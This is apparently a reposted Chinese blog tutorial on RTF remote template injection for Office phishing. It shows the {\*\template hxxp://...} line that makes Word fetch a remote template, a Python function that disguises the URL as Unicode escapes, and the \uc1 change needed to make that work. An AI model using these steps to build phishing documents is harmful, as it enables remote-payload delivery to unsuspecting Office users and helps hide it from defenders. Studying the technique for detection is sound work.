Office RTF远程模板注入
远程模板插入
ProofPoin最近写了一篇文章,报告中提到近年来RTF模板注入进行office钓鱼攻击的数量增加。之前还没怎么了解过RTF模板注入的,现在和小编一起去看看吧(笑hhh)。
相对DOC模板注入的创建而言比较简单,创建一个rtf文档,使用office word进行编辑,随便写个内容。
保存之后会发现文档从原来的几个字节大小变为几十KB。这是因为里面添加了大量RTF文档格式属性字段值。
那如何进行模板注入呢,RTF文档支持一个相关的控制字段:*\template,该字段值需要跟着使用的模板名,整个属性字段需要使用大括号括起来。
然后直接使用文本编辑器打开之前保存的rtf文档。进行远程模板注入的话,插入的内容形如:{\*\template hxxp://xx.xx.xx.xx:port/xxx.xxx}。至于插入位置,经过测试,放在大括号后面,前面,或是之间,都可以获取远程模板。例如:
插入字段并保存修改,再次使用Word打开,成功实现了模板注入。
Unicode形式URL模板插入
更进一步,*\template字段参数值可以为Unicode,可以更好隐藏自身。关于如何将Ascii转为Unicode表示形式,参考[3]文章如下。
Python代码表示如下:
def trans(url):
return ''.join(['\\u'+str(-(0xffff+1-ord(c)))+'?' for c in url])
那如何自制一个RTF Unicode模板注入呢?在原本基础上直接修改\*\template的属性值没用。而按proofpoint文章中所说,涉及到\*\wgrffmtfilter字段,然而查看相应文档,并且经过一番测试,和该字段实际并无关系。通过比对一些网络上的相关技术利用样本后发现,该方式应是和RTF文档首部的\uc字段有关。
\ucN:指定当前大括号中\uN表示的UNICODE字符对应的字节数。
现在只需要修改\uc为\uc1(在中文环境下默认保存为2),然后使用和第一节中相同方式将\*\template字段插入文档,可成功实现。
参考:
[1] https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread
[2] http://www.biblioscape.com/rtf15_spec.htm
[3] https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/
最新文章
- windows 共享文件夹 给 mac
- Merge k Sorted Lists
- HTML5客户端数据存储
- CSS3:渐变大全
- 【转载】FLUNT温度场模拟
- 【题解】【BST】【Leetcode】Unique Binary Search Trees
- 用Python对excel文件的简单操作
- 你了解C语言中的关键字volatile吗?
- 通过控件获取cell
- HTML5动画图片播放器 高端大气
- beforefieldinit释义(3)
- Instruments的使用 逻辑查错,内存泄漏分析等工具集
- /dev/shm 引起的内存统计问题
- PHP 第三方支付
- 【福利】送Spark大数据平台视频学习资料
- Kali配置网卡静态信息
- 重新认识trim,ltrim,rtrim,trailing和leading。
- [日常] nginx与location规则
- Good Time 冲刺 五
- 使用NHibernate(2)-- 让程序跑起来